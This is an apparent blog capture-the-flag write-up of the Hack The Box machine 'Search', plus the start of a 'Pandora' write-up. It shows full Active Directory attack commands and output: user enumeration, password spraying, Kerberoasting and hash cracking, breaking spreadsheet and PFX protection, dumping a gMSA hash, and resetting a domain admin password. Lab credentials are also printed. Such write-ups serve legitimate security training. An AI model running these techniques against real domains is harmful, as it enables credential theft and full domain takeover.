Category: Uncategorized
htb-search-nl
Search
Enumeration
┌─[✗]─[puck@parrot-lt]─[~/htb/search]
└──╼ $nmap -Pn -sV --script "ldap* and not brute*" -p 389 10.10.11.129
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-25 15:51 CET
Stats: 0:00:32 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 97.78% done; ETC: 15:51 (0:00:01 remaining)
Stats: 0:01:32 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 97.78% done; ETC: 15:52 (0:00:02 remaining)
Stats: 0:03:32 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 97.78% done; ETC: 15:54 (0:00:05 remaining)
NSE: [ldap-brute] passwords: Time limit 10m00s exceeded.
NSE: [ldap-brute] passwords: Time limit 10m00s exceeded.
NSE: [ldap-brute] usernames: Time limit 10m00s exceeded.
Nmap scan report for search.htb0 (10.10.11.129)
Host is up (0.096s latency).
Bug in ldap-brute: no string output.
PORT STATE SERVICE VERSION
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: search.htb, Site: Default-First-Site-Name)
| ldap-rootdse:
| LDAP Results
| <ROOT>
| domainFunctionality: 7
| forestFunctionality: 7
| domainControllerFunctionality: 7
| rootDomainNamingContext: DC=search,DC=htb
| ldapServiceName: search.htb:research$@SEARCH.HTB
| isGlobalCatalogReady: TRUE
| supportedSASLMechanisms: GSSAPI
| supportedSASLMechanisms: GSS-SPNEGO
| supportedSASLMechanisms: EXTERNAL
| supportedSASLMechanisms: DIGEST-MD5
| supportedLDAPVersion: 3
| supportedLDAPVersion: 2
| supportedLDAPPolicies: MaxPoolThreads
--snip--
| supportedCapabilities: 1.2.840.113556.1.4.2237
| subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=search,DC=htb
| serverName: CN=RESEARCH,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=search,DC=htb
| schemaNamingContext: CN=Schema,CN=Configuration,DC=search,DC=htb
| namingContexts: DC=search,DC=htb
| namingContexts: CN=Configuration,DC=search,DC=htb
| namingContexts: CN=Schema,CN=Configuration,DC=search,DC=htb
| namingContexts: DC=DomainDnsZones,DC=search,DC=htb
| namingContexts: DC=ForestDnsZones,DC=search,DC=htb
| isSynchronized: TRUE
| highestCommittedUSN: 213347
| dsServiceName: CN=NTDS Settings,CN=RESEARCH,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=search,DC=htb
| dnsHostName: Research.search.htb
| defaultNamingContext: DC=search,DC=htb
| currentTime: 20220125140121.0Z
|_ configurationNamingContext: CN=Configuration,DC=search,DC=htb
Service Info: Host: RESEARCH; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 606.65 seconds
┌─[puck@parrot-lt]─[~/htb/search]
$\> nmap -p- -sV -sC --min-rate 4500 --max-rtt-timeout 1500ms 10.10.11.129 --open
Starting Nmap 7.92 ( https://nmap.org ) at
05:55 GMT
Nmap scan report for search.htb (10.10.11.129)
Host is up (0.15s latency).
Not shown: 65516 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_
Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Search — Just Testing IIS
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time:
135/tcp open msrpc Microsoft Windows RPC
05:56:16Z)
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0.,
Site: Default-First-Site-Name)
|_ssl-date: T05:57:46+00:00; +2s from scanner time.
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:
443/tcp
open
2030-08-09T08:13:35
ssl/http
Microsoft IIS httpd 10.0
| tls-alpn:
|_
http/1.1
|_ssl-date: T05:57:46+00:00; +2s from scanner time.
|_http-server-header: Microsoft-IIS/10.0
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:
2030-08-09T08:13:35
|_http-title: Search — Just Testing IIS
| http-methods:
|_
Potentially risky methods: TRACE
445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0.,
Site: Default-First-Site-Name)
|_ssl-date: T05:57:46+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:
3268/tcp
open
2030-08-09T08:13:35
ldap
Microsoft Windows Active Directory LDAP (Domain: search.htb0.,
Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:
2030-08-09T08:13:35
|_ssl-date: T05:57:46+00:00; +1s from scanner time.
3269/tcp
open
ssl/ldap
Microsoft Windows Active Directory LDAP (Domain: search.htb0.,
Site: Default-First-Site-Name)
|_ssl-date: T05:57:46+00:00; +2s from scanner time.
| ssl-cert: Subject: commonName=research| Not valid before: 2020-08-11T08:13:35
|_Not valid after:
8172/tcp
open
2030-08-09T08:13:35
ssl/http
Microsoft IIS httpd 10.0
| ssl-cert: Subject: commonName=WMSvc-SHA2-RESEARCH
| Not valid before: 2020-04-07T09:05:25
|_Not valid after:
2030-04-05T09:05:25
|_ssl-date: T05:57:46+00:00; +2s from scanner time.
|_http-title: Site doesn't have a title.
| tls-alpn:
|_
http/1.1
|_http-server-header: Microsoft-IIS/10.0
9389/tcp
mc-nmf .NET Message Framing
49666/tcp open
open
msrpc Microsoft Windows RPC
49669/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49670/tcp open msrpc Microsoft Windows RPC
49693/tcp open msrpc Microsoft Windows RPC
Service Info: Host: RESEARCH; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1s, deviation: 0s, median: 1s
| smb2-time:
| date: T05:57:10
|_ start_date: N/A
| smb2-security-mode:
|
|_
3.1.1:
Message signing enabled and required
Nmap reveals a lot of open ports, most of them are Windows based ports. Add the domain to hosts
file. Let’s look into web first.Nothing much available on the web other than team members name. Let’s add these name to a file
and enumerate valid usernames.
$\> ./kerbrute_linux_amd64 userenum users.txt -d search.htb --dc search.htb
__
__
/ /_____
_____/ /_
__
_______
__/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< /
__/ /
/_/|_|\___/_/
/ /_/ / /
/_.___/_/
/ /_/ / /_/
__/
\__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 01/03/22 - Ronnie Flathers @ropnop
2022/01/03 06:08:27 >
2022/01/03 06:08:27 >
Using KDC(s):
search.htb:88
2022/01/03 06:08:27 > [+] VALID USERNAME:
Dax.Santiago@search.htb
2022/01/03 06:08:27 > [+] VALID USERNAME:
Sierra.Frye@search.htb
2022/01/03 06:08:27 > [+] VALID USERNAME:
Keely.Lyons@search.htb
2022/01/03 06:08:27 > Done! Tested 8 usernames (3 valid) in 0.152 seconds
Out of eight users only three are valid. Let’s Try to query the domain for users with ‘Do not require Kerberos pre-authentication’ set and export their TGTs for cracking.
$\> ./GetNPUsers.py search.htb/ -usersfile users.txt
Impacket v0.9.25.dev1+20211027.123255.1dad8f7f - Copyright 2021 SecureAuth Corporation
[-] User Dax.Santiago doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Keely.Lyons doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Sierra.Frye doesn't have UF_DONT_REQUIRE_PREAUTH set
These accounts have not set to ‘Do not require pre-auth’. This means, we can’t perform Kerberoasting attack, it requires a user with Pre-Authentication enabled. We can’t dump LDAP
without a valid password of a user. There’s no any interesting directory’s to look into. However, there’s a image which has interesting information.
If we look at the August 17 date, it says ‘Send password to Hope Sharp’ and password is mentioned IsolationIsKey? We have username and password of Hope user. We can perform password spaying on recently found accounts too.
$\> crackmapexec smb search.htb -u users.txt -p 'IsolationIsKey?' --shares
SMB
10.10.11.129
445
RESEARCH
[*] Windows 10.0 Build 17763 x64
(name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB
10.10.11.129
445 RESEARCH [-] search.htb\Dax.Santiago:IsolationIsKey?
445 RESEARCH [-] search.htb\Keely.Lyons:IsolationIsKey?
445 RESEARCH [-] search.htb\Sierra.Frye:IsolationIsKey?
STATUS_LOGON_FAILURE
SMB
10.10.11.129
STATUS_LOGON_FAILURE
SMB
10.10.11.129
STATUS_LOGON_FAILURE
As you can see, this password is not valid for any of the user which we found recently. Let’s try this password with Hope user.
$\> crackmapexec smb search.htb -u Hope.Sharp -p 'IsolationIsKey?' --shares
SMB
10.10.11.129
445
RESEARCH
[*] Windows 10.0 Build 17763 x64
(name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.129 445 RESEARCH [+] search.htb\Hope.Sharp:IsolationIsKey?
SMB 10.10.11.129 445 RESEARCH [+] Enumerated shares SMB 10.10.11.129 445 RESEARCH Share Permissions Remark
SMB 10.10.11.129 445 RESEARCH ----- ----------- ------
SMB 10.10.11.129 445 RESEARCH ADMIN$ Remote Admin
SMB 10.10.11.129 445 RESEARCH C$ Default
10.10.11.129 445 RESEARCH CertEnroll
share
SMB
READ Active
Directory Certificate Services share
SMB 10.10.11.129 445 RESEARCH helpdesk SMB 10.10.11.129 445 RESEARCH IPC$ READ Remote IPC
SMB 10.10.11.129 445 RESEARCH NETLOGON READ Logon server
10.10.11.129 445 RESEARCH RedirectedFolders$ READ,WRITE
share
SMBSMB
10.10.11.129
445
RESEARCH
SYSVOL
READ
Logon server
share
We have access to couple shared directory’s. Let’s look into them.
$\> smbclient //search.htb/RedirectedFolders$ -U Hope.Sharp Enter WORKGROUP\Hope.Sharp's password:IsolationIsKey? Try "help" to get a list of possible commands. smb: \> ls . Dc 0 Mon Jan 3 06:23:12 2022 .. Dc 0 Mon Jan 3 06:23:12 2022 abril.suarez Dc 0 Tue Apr 7 18:12:58 2020 Angie.Duffy Dc 0 Fri Jul 31 13:11:32 2020 Antony.Russo Dc 0 Fri Jul 31 12:35:32 2020 belen.compton Dc 0 Tue Apr Cameron.Melendez Dc 0 Fri Jul 31 12:37:36 2020 chanel.bell Dc 0 Tue Apr Claudia.Pugh Dc 0 Fri Jul 31 13:09:08 2020 Cortez.Hickman Dc 0 Fri Jul 31 12:02:04 2020 dax.santiago Dc 0 Tue Apr Eddie.Stevens Dc 0 Fri Jul 31 11:55:34 2020 edgar.jacobs Dc 0 Thu Apr Edith.Walls Dc 0 Fri Jul 31 12:39:50 2020 eve.galvan Dc 0 Tue Apr 7 18:23:13 2020 frederick.cuevas Dc 0 Tue Apr 7 18:29:22 2020 hope.sharp Dc 0 Thu Apr 9 14:34:41 2020 jayla.roberts Dc 0 Tue Apr 7 18:07:00 2020 Jordan.Gregory Dc 0 Fri Jul 31 13:01:06 2020 payton.harmon Dc 0 Thu Apr Reginald.Morton Dc 0 Fri Jul 31 11:44:32 2020 santino.benjamin Dc 0 Tue Apr Savanah.Velazquez Dc 0 Fri Jul 31 12:21:42 2020 sierra.frye Dc 0 Thu Nov 18 01:01:46 2021 trace.ryan Dc 0 Thu Apr 7 18:32:31 2020 7 18:15:09 2020 7 18:20:08 2020 9 20:04:11 2020 9 20:11:39 2020 7 18:10:25 2020 9 20:14:26 2020
More user information is present in this directory. Let’s add these to users.txt file. We can access Hope users directory, but for the rest we don’t have permission to read or list the contents.
Now we have a valid username and password, we can dump LDAP.
$\> bloodhound-python -u Hope.Sharp -p 'IsolationIsKey?' -ns 10.10.11.129 -d search.htb -c All
INFO: Found AD domain: search.htb
INFO: Connecting to LDAP server: research.search.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 113 computers
INFO: Connecting to LDAP server: research.search.htb
INFO: Found 106 users
INFO: Found 63 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
----------SNIP----------
We have a vhost, let’s add that to host file. Now we can use this dump to visualize it using bloodhound GUI.
puck@parrot-lt sudo neo4j console puck@parrot-lt bloodhound
Upload all the dumped data.
This is the shortest path to domain admin. However, we don’t have access to any of the user who are member of ‘ITSEC’. We have access to ‘Hope Sharp’ user but she’s not a member of ITSEC. However, if we look for Kerberoastable Accounts, then we’d find two.
This ‘Web_svc’ account is created by HelpDesk and it is temporary. It is being used as Web Service, so basically it is a service account.
The SPN is not null, so we can Kerberoast to extract service account credentials (hash) from Active Directory as a regular user without sending any packets to the target system.
https://swarm.ptsecurity.com/kerberoasting-without-spns/
$\> GetUserSPNs.py -request -dc-ip 10.10.11.129 search.htb/Hope.Sharp:IsolationIsKey?
Impacket v0.9.25.dev1+20211027.123255.1dad8f7f - Copyright 2021 SecureAuth Corporation
ServicePrincipalName
Name MemberOf PasswordLastSet LastLogon
------- -------- -------------------------- ---------
2020-04-09 12:59:11.329031 <never>
Delegation
---------------------------------
---
-------
RESEARCH/web_svc.search.htb:60001
web_svc
$krb5tgs$23$*web_svc$SEARCH.HTB$search.htb/web_svc*$893ce4d4fcc86c204faebe423b7e32e2$688d48c511824
We got the hash of Web_svc service account. Let’s try to crack it.
$\> hashcat -m 13100 web_svc_hash /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...
--------SNIP--------
$krb5tgs$23$*web_svc$SEARCH.HTB$search.htb/web_svc*$e53619cf90ce49f28580953ec9f6ae63$13d69c419359f
Session..........: hashcat
Status...........: Cracked
Hash.Name........: Kerberos 5, etype 23, TGS-REP
--------SNIP--------
We got the password for web_svc service account, let’s spray this password across all the
accounts which we have found so far.
$\> crackmapexec smb search.htb -u users.txt -p '@3ONEmillionbaby' --continue-on-success
SMB
10.10.11.129
445
RESEARCH
[*] Windows 10.0 Build 17763 x64
(name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB
10.10.11.129
445 RESEARCH [-] search.htb\dave.simpson:@3ONEmillionbaby
445 RESEARCH [-] search.htb\Dax.Santiago:@3ONEmillionbaby
445 RESEARCH [-] search.htb\Keely.Lyons:@3ONEmillionbaby
445 RESEARCH [-] search.htb\Sierra.Frye:@3ONEmillionbaby
445 RESEARCH [-] search.htb\Kyla.Stewart:@3ONEmillionbaby
445 RESEARCH [-]
STATUS_LOGON_FAILURE
SMB
10.10.11.129
STATUS_LOGON_FAILURE
SMB
10.10.11.129
STATUS_LOGON_FAILURE
SMB
10.10.11.129
STATUS_LOGON_FAILURE
SMB
10.10.11.129
STATUS_LOGON_FAILURE
SMB
10.10.11.129
search.htb\Chris.Stewart:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB
10.10.11.129
445 RESEARCH [-] search.htb\Ben.Thompson:@3ONEmillionbaby
445 RESEARCH [-]
STATUS_LOGON_FAILURE
SMB
10.10.11.129
search.htb\Kaiara.Spencer:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB
10.10.11.129
445 RESEARCH [-] search.htb\abril.suarez:@3ONEmillionbaby
445 RESEARCH [-] search.htb\Angie.Duffy:@3ONEmillionbaby
445 RESEARCH [-] search.htb\Antony.Russo:@3ONEmillionbaby
445 RESEARCH [-]
STATUS_LOGON_FAILURE
SMB
10.10.11.129
STATUS_LOGON_FAILURE
SMB
10.10.11.129
STATUS_LOGON_FAILURE
SMB
10.10.11.129
search.htb\belen.compton:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB
10.10.11.129
445
RESEARCH
[-]
search.htb\Cameron.Melendez:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB
10.10.11.129
445 RESEARCH [-] search.htb\chanel.bell:@3ONEmillionbaby
445 RESEARCH [-] search.htb\Claudia.Pugh:@3ONEmillionbaby
445 RESEARCH [-]
STATUS_LOGON_FAILURE
SMB
10.10.11.129
STATUS_LOGON_FAILURE
SMB
10.10.11.129
search.htb\Cortez.Hickman:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB
10.10.11.129
445 RESEARCH [-] search.htb\dax.santiago:@3ONEmillionbaby
445 RESEARCH [-]
STATUS_LOGON_FAILURE
SMB
10.10.11.129
search.htb\Eddie.Stevens:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [+] search.htb\edgar.jacobs:@3ONEmillionbaby
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Edith.Walls:@3ONEmillionbaby
445 RESEARCH [-] search.htb\eve.galvan:@3ONEmillionbaby
445 RESEARCH [-]
STATUS_LOGON_FAILURE
SMB
10.10.11.129
STATUS_LOGON_FAILURE
SMB
10.10.11.129
search.htb\frederick.cuevas:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB
10.10.11.129
445 RESEARCH [-] search.htb\hope.sharp:@3ONEmillionbaby
445 RESEARCH [-]
STATUS_LOGON_FAILURE
SMB
10.10.11.129
search.htb\jayla.roberts:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB
10.10.11.129
445
RESEARCH
[-]
search.htb\Jordan.Gregory:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB
10.10.11.129
445
RESEARCH
[-]
search.htb\payton.harmon:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB
10.10.11.129
445
RESEARCH
[-]
search.htb\Reginald.Morton:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB
10.10.11.129
445
RESEARCH
[-]
search.htb\santino.benjamin:@3ONEmillionbaby STATUS_LOGON_FAILURESMB
10.10.11.129
445
RESEARCH
[-]
search.htb\Savanah.Velazquez:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB
10.10.11.129
445 RESEARCH [-] search.htb\sierra.frye:@3ONEmillionbaby
445 RESEARCH [-] search.htb\trace.ryan:@3ONEmillionbaby
STATUS_LOGON_FAILURE
SMB
10.10.11.129
STATUS_LOGON_FAILURE
One user account is using the same password as service account. Let’s look into shares of that user.
$\> smbclient //search.htb/RedirectedFolders$ -U edgar.jacobs Enter WORKGROUP\edgar.jacobs's password:@3ONEmillionbaby Try "help" to get a list of possible commands. smb: \> cd edgar.jacobs\Desktop\ smb: \edgar.jacobs\Desktop\> ls . DRc 0 .. DRc 0 Mon Aug 10 10:02:16 2020 $RECYCLE.BIN DHSc 0 Thu Apr desktop.ini AHSc 282 Microsoft Edge.lnk Ac 1450 Phishing_Attempt.xlsx Ac 23130 Mon Aug 10 10:02:16 2020 9 20:05:29 2020 Mon Aug 10 10:02:16 2020 Thu Apr 9 20:05:03 2020 Mon Aug 10 10:35:44 2020 3246079 blocks of size 4096. 458055 blocks available smb: \edgar.jacobs\Desktop\> get Phishing_Attempt.xlsx
There’s a XLS file, download that to your machine.
This XLS document has two sheets, one of them has captured passwords of phishing and another
has a list of username. As you can see the lock symbol on second sheet, a column is being
locked with a password.You can confirm it by resizing the cell which is in between lastname and Username. There are
two ways to remove the password. Upload it on google drive and access it via sheets, it will
remove the password for you. This is the easiest way. If you want to remove it manually, then
you need unzip this xlsx file and delete the below link from the sheet2.xml file.
<sheetProtection algorithmName=”SHA-512″
hashValue=”hFq32ZstMEekuneGzHEfxeBZh3hnmO9nvv8qVHV8Ux+t+39/22E3pfr8aSuXISfrRV9UVfNEzidgv+Uvf8C5Tg”
saltValue=”U9oZfaVCkz5jWdhs9AA8nA” spinCount=”100000″ sheet=”1″ objects=”1″ scenarios=”1″/>
You can find this ‘sheet2.xml’ file after unzipping the xlsx file. Location:
xl/worksheets/sheet2.xml Once you delete that line, you need to zip it back.
$\> zip -r Phishing.xls .
Open the xls file and double click on the line which is between D and B to see the passwords.
firstname | lastname | password | Username |
Payton | Harmon | ;;36!cried!INDIA!year!50;; | Payton.Harmon |
Cortez | Hickman | ..10-time-TALK-proud-66.. | Cortez.Hickman |
Bobby | Wolf | ??47^before^WORLD^surprise^91?? | Bobby.Wolf |
Margaret | Robinson | //51+mountain+DEAR+noise+83// | Margaret.Robinson |
Scarlett | Parks | ++47|building|WARSAW|gave|60++ | Scarlett.Parks |
Eliezer | Jordan | !!05_goes_SEVEN_offer_83!! | Eliezer.Jordan |
Hunter | Kirby | ~~27%when%VILLAGE%full%00~~ | Hunter.Kirby |
Sierra | Frye | $$49=wide=STRAIGHT=jordan=28$$18 | Sierra.Frye |
Annabelle | Wells | ==95~pass~QUIET~austria~77== | Annabelle.Wells |
Eve | Galvan | //61!banker!FANCY!measure!25// | Eve.Galvan |
Jeramiah | Fritz | ??40:student:MAYOR:been:66?? | Jeramiah.Fritz |
Abby | Gonzalez | &&75:major:RADIO:state:93&& | Abby.Gonzalez |
Joy | Costa | **30*venus*BALL*office*42** | Joy.Costa |
Vincent | Sutton | **24&moment&BRAZIL&members&66** | Vincent.Sutton |
Now we have 15 more username & passwords. If we look at the bloodhound visual path to domain
admin, out of all the users, there are only two are in the password list. Abby and Sierra will
lead to domain admin. The Abby password didn’t work, but Sierra’s did.
$\> smbclient //search.htb/RedirectedFolders$ -U Sierra.Frye Enter WORKGROUP\Sierra.Frye's password: $$49=wide=STRAIGHT=jordan=28$$18 Try "help" to get a list of possible commands. smb: \> cd sierra.frye\Desktop\ smb: \sierra.frye\Desktop\> ls . DRc 0 .. DRc 0 Thu Nov 18 01:08:00 2021 Thu Nov 18 01:08:00 2021 $RECYCLE.BIN DHSc 0 Tue Apr desktop.ini AHSc 282 Microsoft Edge.lnk Ac 1450 user.txt Ac 33 7 18:03:59 2020 Fri Jul 31 14:42:15 2020 Tue Apr 7 12:28:05 2020 Thu Nov 18 00:55:27 2021 3246079 blocks of size 4096. 459005 blocks available smb: \sierra.frye\Desktop\> get user.txt getting file \sierra.frye\Desktop\user.txt of size 34 as user.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
We have user flag now.
smb: \sierra.frye\Downloads\Backups\> ls . DHc 0 Mon Aug 10 20:39:17 2020 .. DHc 0 Mon Aug 10 20:39:17 2020 Ac 2643 Fri Jul 31 15:04:11 2020 search-RESEARCH-CA.p12staff.pfx Ac 4326 Mon Aug 10 20:39:17 2020 3246079 blocks of size 4096. 458996 blocks available
Under Downloads we will find Cryptography files. Let’s download them to our machine.
A p12 file contains a digital certificate that uses PKCS#12 (Public Key Cryptography
Standard #12) encryption. It is used as a portable format for transferring personal private
keys and other sensitive information. P12 files are used by various security and encryption
programs. It is generally referred to as a “PFX file”.
We can try to upload this certificate to browser (firefox).
It asks for the password. We can try to crack the password using bellow tool.
GitHub – Ridter/p12tool: A simple Go script to brute force or parse a password-protected
PKCS#12 (PFX/P12) file.
$\> ./p12tool crack -c staff.pfx -f /usr/share/wordlists/rockyou.txt ██████╗ ██╗██████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╔══██╗███║╚════██╗╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██████╔╝╚██║ █████╔╝ ██║ ██║ ██║██║ ██║██║ ██╔═══╝ ██║██╔═══╝ ██║ ██║ ██║██║ ██║██║ ██║ ██║███████╗ ██║ ╚██████╔╝╚██████╔╝███████╗ ╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ Version: 1.0 (n/a) - 01/03/22 - Evi1cg 2022/01/03 02:34:13 -> [*] Brute forcing... 2022/01/03 02:34:13 -> [*] Start thread num 100 2022/01/03 03:01:44 -> [+] Password found ==> misspissy 2022/01/03 03:01:44 -> [*] Successfully cracked password after 5484391 attempts!
If you are on VM then it’d take much more time. Now we have the password for the certificate (misspissy)
Let’s add it in our browser.There’s a specific endpoint which you can access with this certificate.
Now we need to input the credentials of ‘Sierra’ user ‘$$49=wide=STRAIGHT=jordan=28$$18’ and access PowerShell Console.
After login we can run Powershell commands.
Let’s go back to bloodhound and look for path from owned principle to domain admin.As we are member of ITSEC, we can read GMSA password.
BIR-ADFS-GMSA@SEARCH.HTB is a Group Managed Service Account. The group ITSEC@SEARCH.HTB can
retrieve the password for the GMSA BIR-ADFS-GMSA@SEARCH.HTB.
$\> python3 gMSADumper.py -d search.htb -u 'Sierra.Frye' -p '$$49=wide=STRAIGHT=jordan=28$$18'
BIR-ADFS-GMSA$:::e1e9fd9e46d0d747e1595167eedcec0f
gMSAs use 240-byte, randomly generated complex passwords. So, it’s hard to crack.
PayloadsAllTheThings/Active Directory Attack.md at master · swisskyrepo/PayloadsAllTheThings
Passwordless PowerShell
GMSA Attributes in the Active Directory
msDS-GroupMSAMembership ( PrincipalsAllowedToRetrieveManagedPassword ) – stores the
security principals that can access the GMSA password.
msds-ManagedPassword – This attribute contains a BLOB with password information for
group-managed service accounts.
msDS-ManagedPasswordId – This constructed attribute contains the key identifier for the
current managed password data for a group MSA.
msDS-ManagedPasswordInterval – This attribute is used to retrieve the number of days
before a managed password is automatically changed for a group MSA.
Based on these both blogs, we can run commands as BIR-ADFS-GMSA to set an environment to access
domain admin
$user = ‘BIR-ADFS-GMSA$’
$gmsa = Get-ADServiceAccount -Identity $user -Properties ‘msDS-ManagedPassword’
$blob = $gmsa.’msDS-ManagedPassword’
$mp = ConvertFrom-ADManagedPasswordBlob $blob
$cred = New-Object System.Management.Automation.PSCredential $user,
$mp.SecureCurrentPassword
With these above we are setting up the GMSA password to be used and runas ‘BIR-ADFS-GMSA$’
user.
Windows PowerShell Copyright (C) 2016 Microsoft Corporation. All rights reserved. PS C:\Users\Sierra.Frye\Documents> $user = 'BIR-ADFS-GMSA$' PS C:\Users\Sierra.Frye\Documents> $gmsa = Get-ADServiceAccount -Identity $user -Properties 'msDS-ManagedPassword' PS C:\Users\Sierra.Frye\Documents> $blob = $gmsa.'msDS-ManagedPassword' PS C:\Users\Sierra.Frye\Documents> $mp = ConvertFrom-ADManagedPasswordBlob $blob PS C:\Users\Sierra.Frye\Documents> $cred = New-Object System.Management.Automation.PSCredential $user, $mp.SecureCurrentPassword PS C:\Users\Sierra.Frye\Documents> Invoke-Command -ComputerName localhost -Credential $cred -ScriptBlock {whoami} search\bir-adfs-gmsa$ PS C:\Users\Sierra.Frye\Documents>
Everything is set, now we need to invoke commands to run any type of script/command.
Invoke-Command -ComputerName localhost -Credential $cred -ScriptBlock {whoami}
For that we will use above command to know which user access we have right now.
$user = 'BIR-ADFS-GMSA$' $gmsa = Get-ADServiceAccount -Identity $user -Properties 'msDS-ManagedPassword' $blob = $gmsa.'msDS-ManagedPassword' $mp = ConvertFrom-ADManagedPasswordBlob $blob $cred = New-Object System.Managment.Automation.PSCredential $user, $mp.SecureCurrentPassword Invoke-Command -ComputerName localhost -Credential $cred -ScriptBlock {whoami}
As you can see ‘whoami’ result is showing that we are ‘BIR-ADFS-GMSA$’ user, not ‘Sierra’.
Let’s look into Bloodhound one more time.Let’s look into help of ‘Generic all’.
As you can see ‘Generic All’ privileges simply means full control over ‘Tristan’ user, who is
also a domain admin. Let’s change the domain admin password.
Invoke-Command -ComputerName localhost -Credential $cred -ScriptBlock {net user Tristan.Davies qwerty1234 /domain}
Now we can access admin directory to read the root flag.
$\> smbclient //search.htb/C$ -U Tristan.Davies Enter WORKGROUP\Tristan.Davies's password: Try "help" to get a list of possible commands. smb: \> ls $RECYCLE.BIN DHSc 0 Mon Mar 23 19:24:13 2020 Config.Msi DHSc 0 Thu Dec 16 17:08:46 2021 DHSrn 0 Sun Mar 22 23:46:47 2020 HelpDesk Dc 0 Tue Apr 14 10:24:23 2020 inetpub Dc 0 Mon Mar 23 07:20:20 2020 Documents and Settings pagefile.sys AHS 738197504 PerfLogs Mon Jan 3 07:18:09 2022 Dc 0 Thu Jul 30 14:43:39 2020 DRc 0 Thu Dec 16 17:07:44 2021 Dc 0 Sat Sep 15 07:21:46 2018 DHcn 0 Tue Apr 14 10:24:03 2020 DHScn 0 Sun Mar 22 23:46:48 2020 Dc 0 Mon Jan System Volume Information DHS 0 Tue Mar 31 14:13:38 2020 Users DRc 0 Tue Aug 11 07:45:30 2020 Dc 0 Mon Dec 20 08:10:02 2021 Program Files Program Files (x86) ProgramData Recovery RedirectedFolders Windows 3 07:55:00 2022 3246079 blocks of size 4096. 534471 blocks available smb: \Users\Administrator\Desktop\> get root.txt getting file \Users\Administrator\Desktop\root.txt of size 34 as root.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
..
Protected: htb-meta-private
Protected: htb-hancliffe-private
htb-pandora-private
Highlights
Enumeration using nmap reveals a web service which seems to be serving static pages. UDP scan reveals SNMP open. Enumerating SNMP using reveals user credentials. Once inside the box, we see another website only accessible to localhost. This website hosts an open source monitoring system with a known vulnerability. Exploiting the same, we get a more privileged shell as another user. From there onwards an SUID vulnerability leads to root access.
First we start with the nmap scan.
nmap -sV -sC 10.129.252.195
We see that the TCP ports 22(ssh) and 80(http) are open. Let’s check what the port 80 gives us.
Navigating the website, it seems like all are static pages and no dynamic content is being shown. There is one form for filling sending a message to admins, but the form does not do anything except refresh the page. There is also not a robots.txt that may reveal some juicy info. Maybe there are some interesting hidden directories, let’s fire gobuster!
gobuster dir -u http://10.129.252.195 -w /usr/share/wordlist/directory-list-2.3-small.txt
Gobuster gives nothing interesting except, the /assets directory which contains javascript and css files and some images. Maybe this is the directory where it is fetching the contents on the main website from.
Lets try a UDP scan.
┌─[✗]─[puck@parrot-lt]─[~/htb/pandora]
└──╼ $sudo nmap -v --min-rate 10000 -sU pandora.htb -oN udp_nmap
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-09 11:56 CEST
Initiating Ping Scan at 11:56
Scanning pandora.htb (10.10.11.136) [4 ports]
Completed Ping Scan at 11:56, 0.12s elapsed (1 total hosts)
Initiating UDP Scan at 11:56
